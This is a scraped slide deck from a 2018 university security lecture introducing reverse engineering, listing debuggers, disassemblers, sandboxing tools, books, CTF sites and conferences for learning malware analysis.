Reverse Engineering CS 166 Armen Boursalian 30 Apr 2018 Reverse - - PowerPoint PPT Presentation

reverse engineering
SMART_READER_LITE
LIVE PREVIEW

Reverse Engineering CS 166 Armen Boursalian 30 Apr 2018 Reverse - - PowerPoint PPT Presentation

May 28, 2023 514 likes •636 views

Reverse Engineering CS 166 Armen Boursalian 30 Apr 2018 Reverse Engineering Take a product, understand how it works Usually limited to certain aspects, not full systems Need to know a little bit about a lot of topics to gain

slide-1
SLIDE 1

Reverse Engineering

CS 166 Armen Boursalian 30 Apr 2018

slide-2
SLIDE 2

Reverse Engineering

  • Take a product, understand how it works
  • Usually limited to certain aspects, not full systems
  • Need to know a little bit about a lot of topics to gain understanding
  • Need to know a lot about a lot of topics to make significant changes
  • Often learning on the job
slide-3
SLIDE 3

Capture the Flag (CTF)

  • Hacking competitions
  • Challenges presented; covers many topics
  • https://ctftime.org/

○ Register teams for leaderboard (not required) ○ Check calendar for upcoming CTFs

  • http://overthewire.org/wargames/

○ Similar, but not live/timed events

  • See Resources at the end for more
slide-4
SLIDE 4

Concepts

  • Learn what type of object you are reverse engineering. Is it a(n)…

○ Windows EXE? ○ Office document? ○ Script? ○ Encoded/encrypted blob?

  • Let the malware (or object/code/whatever is in front of you) do the work
  • Google EVERYTHING
slide-5
SLIDE 5

What we’ll be going over today...

  • A mix of FLARE-On + LabyREnth challenges
  • Real life malware
  • Introduction to tools used to reverse engineer
  • What to look for
  • Live demos from here on…
  • Please ask questions!
slide-6
SLIDE 6

Resources - Debuggers

  • gdb

○ Linux, command line-based

  • WinDbg

○ Windows, command line-based

  • lldb

○ OSX, command line-based

  • x64dbg

○ Windows, GUI ○ https://x64dbg.com/

  • radare2

○ Multiplatform, command line-based (vim-like) ○ Significant learning curve, but very powerful! ○ https://github.com/radare/radare2/

  • IDA Pro (not the freeware version)
  • OllyDbg

○ Windows, only ○ http://www.ollydbg.de/ ○ Becoming outdated, but tried, tested, and trusted

  • edb-debugger

○ Linux, mainly ○ OllyDbg clone ○ https://github.com/eteran/edb-debugger

slide-7
SLIDE 7

Resources - Disassemblers

  • All of the tools listed in Debuggers are also disassemblers
  • Capstone

○ For scripting; useful in Python ○ https://github.com/aquynh/capstone/

  • bjdump (Linux)

○ CLI tool for dumping code and other artifacts out of ELF (Linux executable format) binaries

  • tool (objdump for OSX)

○ Also useful for parsing out the Mach-O executable file format for OSX binaries

slide-8
SLIDE 8

Resources - Dynamic Execution (Sandboxing)

  • Process Hacker 2

○ Advanced Task Manager for Windows, allows manipulating running processes, injecting code, etc.

  • procmon

○ Process monitor for windows, allows viewing events generated by processes, e.g. files

  • pened, processes executed, etc.
  • FakeNet

○ Intercept and, optionally, manipulate network traffic ○ Extensible with plugins so that you can write a fake command and control server to communicate with malware

slide-9
SLIDE 9

Resources - Reading Material

  • Practical Malware Analysis, by Michael Sikorski

○ Excellent malware analysis introduction with labs/questions and answers to guide you ○ Good for reverse engineering in general, not just malware

  • Reverse Engineering, by Bruce Dang
  • The Art of Memory Forensics, by Michael Hale Ligh
  • Follow people/organizations on Twitter

○ @TheHackerNews ■ Random security news ○ @patrickwardle ■ Former NSA; active in exploit research and writes many free tools for OSX defense ○ @virustotal - online sandbox ○ @cyb3rops - Florian Roth (detections, malware/actor tracking)

slide-10
SLIDE 10
  • FLARE-On Challenge (http://flare-on.com/)

○ Past challenges can be downloaded in bulk; no need to solve in sequence ○ Search online for peoples’ writeups if you need help (Reddit, etc.) ○ Check back (or check Reddit/Twitter) in June/July for news on this year’s challenge

  • LabyREnth Challenge (https://labyrenth.com)

○ Past challenges may or may not be available; check it out ○ Check back (or check Reddit/Twitter) in June/July for news on this year’s challenge

  • Check CTF Time for upcoming events

○ https://ctftime.org/ ○ 2 CTFs this weekend!

  • http://overthewire.org/wargames/

○ Similar, but not live/timed events

Resources - CTFs

slide-11
SLIDE 11

Resources - Conferences

  • DEFCON

○ Inexpensive ○ Presentations are often peoples’ pet projects ○ Various competitions and amusements ○ During late summers

  • BlackHat

○ Expensive ○ Geared toward training sessions ○ During late summers

  • RSA

○ Enterprise security products ○ Mid-spring (just passed 2 weeks ago)

  • Check around Twitter/Reddit/community for other conferences